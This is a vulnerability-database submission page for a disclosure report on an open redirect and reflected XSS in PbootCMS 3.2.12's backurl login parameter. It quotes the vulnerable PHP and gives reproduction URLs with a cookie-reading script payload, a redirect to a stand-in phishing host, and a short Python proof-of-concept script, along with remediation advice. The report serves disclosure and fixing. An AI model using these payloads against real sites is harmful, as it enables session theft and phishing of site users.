Отправить #773904: 翱云科技 PbootCMS 3.2.12 Reflected XSSИнформация

Название	翱云科技 PbootCMS 3.2.12 Reflected XSS
Описание	Title PbootCMS 3.2.12 Open Redirect and Reflected XSS via backurl Parameter Product PbootCMS Affected Version 3.2.12 Vulnerability Type CWE-601: URL Redirection to Untrusted Site CWE-79: Cross-Site Scripting Severity High Suggested CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Base Score: 6.1 Overview The member login flow accepts a backurl parameter and uses it directly as a redirect target after successful login. The same value is also inserted into JavaScript output without context-aware encoding, enabling both open redirect and reflected XSS. Audit Methodology The issue was identified through static analysis of the post-login redirect flow and dynamically supported through response inspection using crafted payloads. Audit Workflow Reviewed login success redirect handling in apps/home/controller/MemberController.php. Traced backurl into alert_location() in core/function/helper.php. Confirmed direct insertion into JavaScript assigned to location.href. Built redirect and JavaScript string-breaking payloads. Verified direct reflection of attacker-controlled data in the script context. Affected Code Locations File: apps/home/controller/MemberController.php if (! ! $backurl = get('backurl')) { alert_location('登录成功！', $backurl, 1); } File: core/function/helper.php echo '<script type="text/javascript">alert("' . clear_html_blank($info) . '");location.href="' . $url . '";</script>'; Root Cause The application trusts a user-controlled redirect target and embeds it into a JavaScript string without output encoding for the correct context. Reproduction Steps Open redirect: /member/login?backurl=https://evil.example.com/phishing Reflected XSS: /member/login?backurl=";alert(document.cookie);// Embedded PoC Script Source: security_poc/poc_xss_redirect.py import requests from urllib.parse import urljoin, quote def test_open_redirect(base_url, session): test_url = urljoin(base_url, "/member/login?backurl=https://evil.example.com") resp = session.get(test_url, timeout=10) print(resp.status_code) print(resp.text[:500]) def test_xss_backurl(base_url, session): payload = '";alert(document.cookie);//' test_url = urljoin(base_url, f"/member/login?backurl={quote(payload)}") resp = session.get(test_url, timeout=10) print(resp.status_code) print(resp.text[:500]) session = requests.Session() base_url = "http://localhost:8888" test_open_redirect(base_url, session) test_xss_backurl(base_url, session) Impact Phishing through post-login redirection to attacker-controlled domains Arbitrary JavaScript execution in the victim browser Potential session theft and follow-on browser-based attacks Remediation Restrict redirect targets to relative internal paths or a strict allowlist Apply context-aware output encoding for JavaScript sinks Prefer server-side redirects over inline script generation
Источник	⚠️ https://github.com/zzj-create/cvetest/blob/main/VULN-05_BACKURL_OPEN_REDIRECT_XSS_REPORT_EN.md
Пользователь	zmjjkk (UID 96182)
Представление	06.03.2026 12:44 (3 месяцы назад)
Модерация	20.03.2026 15:26 (14 days later)
Статус	принято
Запись VulDB	352076 [PbootCMS до 3.2.12 Parameter MemberController.php alert_location backurl межсайтовый скриптинг]
Баллы	20

◂ Предыдущий Обзор Далее ▸

Might our Artificial Intelligence support you?

Check our Alexa App!